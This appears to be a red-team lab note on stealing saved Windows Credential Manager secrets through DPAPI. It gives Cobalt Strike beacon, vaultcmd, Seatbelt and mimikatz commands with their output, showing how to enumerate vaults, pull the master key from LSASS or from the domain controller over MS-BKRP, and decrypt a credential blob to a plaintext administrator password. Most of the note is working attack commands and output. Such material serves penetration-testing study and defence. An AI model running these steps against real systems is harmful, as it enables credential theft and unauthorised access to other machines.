Secondary Categories: 02 - Cryptography 02 - Privilege Escalation Links: Dumping Credentials Data Protection API (DPAPI) Search Tag:πŸ“•

Credential Manager


There are two concepts:

  • Vaults : Holds records of encrypted credentials and a reference to encrypted blobs
  • Credentials : The actually encrypted blob

Cobalt Strike

To enumerate the users vaults:

beacon> run vaultcmd /list
Currently loaded vaults:
	Vault: Web Credentials
	Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
	Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
	Vault: Windows Credentials
	Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
	Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
Credentials in vault: Windows Credentials
Credential schema: Windows Domain Password Credential
Resource: Domain:target=TERMSRV/
Identity: SQL-2\Administrator
Hidden: No
Roaming: No
Property (schema element id,value): (100,2)


Another option is to run Seatbelt you can do this in Cobalt Strike using execute-assembly

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
====== WindowsVault ======
  Vault GUID     : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Vault Type     : Web Credentials
  Item count     : 0
  Vault GUID     : 77bc582b-f0a6-4e15-4e80-61736b6f3b29
  Vault Type     : Windows Credentials
  Item count     : 1
      SchemaGuid   : 3e0e35be-1b77-43e7-b873-aed901b6275b
      Resource     : String: Domain:target=TERMSRV/
      Identity     : String: SQL-2\Administrator
      PackageSid   : (null)
      Credential   : 
      LastModified : 9/6/2022 9:12:12 AM

based on the results above we know that the user has saved credentials for SQL2 we can find the specific credentials for these here:

beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
[*] Listing: C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 468b     fil     09/06/2022 10:34:22   6C33AC85D0C4DCEAB186B3B2E5B1AC7C
 10kb     fil     08/30/2022 08:42:59   DFBE70A7E5CC19A398EBF1B96859CE5D

You can also do this with Seatbelt:

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======
  Folder : C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
    FileName     : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
    Description  : Local Credential Data
    MasterKey    : bfc5090d-22fe-4058-8953-47f6882f549e
    Accessed     : 9/6/2022 10:50:44 AM
    Modified     : 9/6/2022 10:50:44 AM
    Size         : 468
    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D
    Description  : Local Credential Data
    MasterKey    : bfc5090d-22fe-4058-8953-47f6882f549e
    Accessed     : 9/6/2022 10:50:44 AM
    Modified     : 9/6/2022 10:50:44 AM
    Size         : 11036

Seatbelt also provides the GUID master key used to encrypt the crednetials. The master keys are stored in the users roamer β€œProtect” directory… but they are also encrypted.

beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
[*] Listing: C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\
 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 740b     fil     08/15/2022 17:34:31   bfc5090d-22fe-4058-8953-47f6882f549e
 928b     fil     08/15/2022 17:34:31   BK-DEV
 24b      fil     08/15/2022 17:34:31   Preferred

What we must do is decrypt the master key first to obtain the AES128/256 encrypting key use use that to decrypt the credentual blob. There are two ways to do this…

Option 1

If you have local admin access on the machine the key is cached in LSASS. Although it will not be in the cache if the user has not recently accessed/decrypted the credential.

beacon> mimikatz !sekurlsa::dpapi
Authentication Id : 0 ; 1075454 (00000000:001068fe)
Session           : RemoteInteractive from 2
User Name         : bfarmer
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 9/6/2022 9:09:54 AM
SID               : S-1-5-21-569305411-121244042-2357301523-1104
	 * GUID      :	{bfc5090d-22fe-4058-8953-47f6882f549e}
	 * Time      :	9/6/2022 11:27:44 AM
	 * MasterKey :	8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
	 * sha1(key) :	897f7bf129e6a898ff4e20e9789009d5385be1f3

We can see that the GUID matches what we are looking for, so the key is: 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214

Option 2

Another way to get the master key which does not require elevation or interactuin with LSASS is to request it from the domain controller via Microssoft BackKey Remote Protocol (MS-BKRP). This is a failsafe option in case a user changes or forgets their password and to support various smart card functionality.

beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
[domainkey] with RPC
[DC] '' will be the domain
[DC] '' will be the DC server
  key : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
  sha1: 897f7bf129e6a898ff4e20e9789009d5385be1f3

This will only work if executed in the context of the user whos key we need to retrive.

Decrypting DPAPI

beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
  TargetName     : Domain:target=TERMSRV/
  UserName       : SQL-2\Administrator
  CredentialBlob : wIfY&cZ&d?QP9iMFEzckmj.34=@sg.*i


Created Date: November 19th 2022 10:26
Last Modified Date: November 19th 2022 10:26